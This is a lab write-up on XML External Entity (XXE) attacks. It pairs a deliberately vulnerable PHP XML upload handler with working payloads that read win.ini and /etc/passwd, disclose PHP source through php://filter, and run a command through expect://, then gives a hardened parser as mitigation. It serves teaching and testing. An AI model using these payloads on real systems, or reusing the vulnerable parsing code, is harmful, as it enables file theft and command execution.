
Lab - XML eXternal Entity Attack

2015-07-18 13:17

Prepare

Lab

Linux kali 3.14-kali1-686-pae


Requirements

# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5


Demo Code

<html>
<body>
<h1>Process XML</h1>

<form action="" method="post" enctype="multipart/form-data">
<label for="file">Archive XML:</label>
<input type="file" name="file" id="file">
<input type="submit" name="submit" value="submit"><br />
</form>
<hr>
<h1>Results</h1>
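<?php

# error_reporting(E_ALL);
# ini_set("display_errors", 1);

// Deliberately vulnerable lab code: the uploaded XML is parsed as-is,
// including any DTD it declares.
if ( isset($_FILES["file"]) ) {
    $doc = new DOMDocument();

    // Validate against the document's own DTD while parsing.
    $doc->validateOnParse = true;
    $doc->load($_FILES["file"]["tmp_name"]);

    // Echo the text content of every <data> element.
    $tags = $doc->getElementsByTagName("data");
    foreach ($tags as $tag) {
        echo "<pre>" . $tag->nodeValue . "</pre>\n";
    }
} else {
    echo "invalid xml format";
}

?>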

</body>
</html>


Exploit







Windows

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>


Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]>
<xxx>&message;</xxx>


Linux

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>


Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]>
<somexml><message>&hello;</message></somexml>


Command Execution

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>
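
Mitigation

A hardened counterpart to the Demo Code handler, as an added example that is not part of the original post: it parses the upload without DTD validation or entity substitution and refuses any document that carries a DOCTYPE, which covers the file://, php://filter and expect:// payloads above. The helper name parse_untrusted_xml() is hypothetical and PHP 7 or later is assumed.

```php
<?php
// Added example, not from the original page. Assumes PHP 7 or later.
// parse_untrusted_xml() is a hypothetical helper name.

function parse_untrusted_xml(string $xml): DOMDocument
{
    if ($xml === '') {
        throw new RuntimeException('empty upload');
    }
    // PHP before 8.0 may be linked against libxml2 older than 2.9, which
    // resolves external entities by default; turn the loader off there.
    // The call is deprecated from PHP 8.0, so it is skipped on newer versions.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $previous = libxml_use_internal_errors(true);

    $doc = new DOMDocument();
    // validateOnParse is left at its default (false), and neither LIBXML_NOENT,
    // LIBXML_DTDLOAD nor LIBXML_DTDVALID is passed. LIBXML_NONET blocks network
    // fetches. loadXML() on a string is used because load() on a path also
    // goes through the disabled entity loader.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$ok) {
        throw new RuntimeException('not well-formed XML');
    }
    // The form only needs <data> elements, so any DOCTYPE is refused outright.
    // Checking the parsed tree avoids encoding tricks against a string match.
    foreach ($doc->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new RuntimeException('DOCTYPE is not accepted');
        }
    }
    return $doc;
}

if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
    try {
        $doc = parse_untrusted_xml((string) file_get_contents($_FILES['file']['tmp_name']));
        foreach ($doc->getElementsByTagName('data') as $tag) {
            // Escape on output so parsed text cannot inject markup.
            echo '<pre>' . htmlspecialchars($tag->nodeValue, ENT_QUOTES, 'UTF-8') . "</pre>\n";
        }
    } catch (RuntimeException $e) {
        echo 'rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```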


References

https://pentesterlab.com/exercises/play_xxe

http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html

http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html

http://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html

http://stackoverflow.com/questions/24117700/clarifications-on-xxe-vulnerabilities-throughout-php-versions